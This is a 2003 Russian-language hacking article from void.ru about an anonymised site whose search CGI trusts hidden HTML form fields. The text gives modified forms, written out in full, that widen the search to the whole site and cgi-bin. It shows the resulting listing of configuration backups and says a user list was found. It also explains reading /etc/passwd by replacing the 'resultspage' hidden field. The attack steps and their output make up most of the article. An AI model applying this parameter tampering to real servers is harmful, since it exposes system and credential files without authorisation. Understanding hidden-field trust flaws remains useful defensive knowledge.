Утечка информации о сервере через скрытые поля html-кода
[ 2003/10/08,durito ]Сколько раз уже говорили о опасности сокрытой в скрытых формах, но все равно встречаются умельцы, которые пренебрегают ею.
В html-коде index'ной страницы сервера www.xxx.com есть такой вот фрагмент: (ненужные элементы дизайна удалены)
как уже стало понятно, это скрипт поисковой системы по сайту. но вот эти строчки особенно интересны:<form method=POST action="../../cgi-bin/wsmsearch2.cgi">Search Site: <input type=text name="terms" size=20><input type=hidden name=boolean value="AND"><input type=hidden name=case value="Insensitive"><input type=hidden name=quicksearch value="NO"><input type=hidden name=max value="50"><input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com"><input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html"><input type=submit value="Search!">
<input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com"><input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html">
/opt2/xxx/httpd/htdocs
- это инсталяционный путь сайта, но это еще не все.
скрипт поиска берет свои данные из скрытых форм:
то есть поиск производиться в папках:<input type=hidden name=boolean value="AND"><input type=hidden name=case value="Insensitive"><input type=hidden name=quicksearch value="NO"><input type=hidden name=max value="50"><input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com"><input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html">
manual/ updates/
и корневой папке сервера
http://www.xxx.com/ _ *.*
(интересно что с помощью этого поикового скрипта был обнаружен файл:
www_xxx_user_list.txt
в корне сервера, это список юзеров).
так вот здесь можно манипулировать запросами скрипта. создаем html вот с таким кодом:
то есть просто убираем строчки:<form method=POST action="../../../www.xxx.com/cgi-bin/wsmsearch2.cgi">Search Site: <input type=text name="terms" size=20><input type=hidden name=boolean value="AND"><input type=hidden name=case value="Insensitive"><input type=hidden name=quicksearch value="NO"><input type=hidden name=max value="50"><input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs"><input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html"><input type=submit value="Search!">
_ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com
и выполняем поисковый запрос по всему сайту.
так же можно искать файлы и в
/opt2/xxx/httpd/htdocs/cgi-bin/
:
вот что было обнаружено в результате этих запросов:<form method=POST action="../../../www.xxx.com/cgi-bin/wsmsearch2.cgi">Search Site: <input type=text name="terms" size=20><input type=hidden name=boolean value="AND"><input type=hidden name=case value="Insensitive"><input type=hidden name=quicksearch value="NO"><input type=hidden name=max value="50"><input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs_ http://www.xxx.com/ _ *.* cgi-bin/ _ http://www.xxx.com"><input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html"><input type=submit value="Search!">
Here are your search results for the keyword(s) conf.dont_use in order of relevance. 1) conf.dont_use/srm.conf.old SIZE: 7354 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 2) conf.dont_use/srm.conf SIZE: 7436 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 3) conf.dont_use/sessiond.conf SIZE: 159 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 4) conf.dont_use/mime.types SIZE: 2652 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 5) conf.dont_use/imagemap.conf SIZE: 1062 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 6) conf.dont_use/httpsd.conf.dave SIZE: 43652 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 7) conf.dont_use/httpsd.conf.11-20-2001 SIZE: 43841 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 8) conf.dont_use/httpsd.conf-backup SIZE: 13243 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 9) conf.dont_use/httpsd.conf SIZE: 43927 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 10) conf.dont_use/httpd.conf.vhback SIZE: 7225 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 11) conf.dont_use/httpd.conf.11-20-2001 SIZE: 7451 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 12) conf.dont_use/httpd.conf SIZE: 7451 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 13) conf.dont_use/access.conf SIZE: 1725 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0и еще один скрипт:
Here are your search results for the keyword(s) securedata in order of relevance. 1) cgi-bin/conf.dont_use/resetsecuredata.cgi SIZE: bytes TYPE: CGIsсript Term: securedata Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
Ну а всеми любимый
/etc/passwd
получается совсем просто : достаточно просто значение скрытого поля
resultspage
заменить на
/etc/passwd
.
Вот так вот иногда администраторы сервера пытаются залатать всевозможные дыры, накатывая последние патчи, а информация утекает просто из html-кода.
твой bug Durito
_________________
EAT THE RICH!
Copyright 2002-2003 by void.ru All rights reserved.
Дата створення/оновлення: 25.05.2018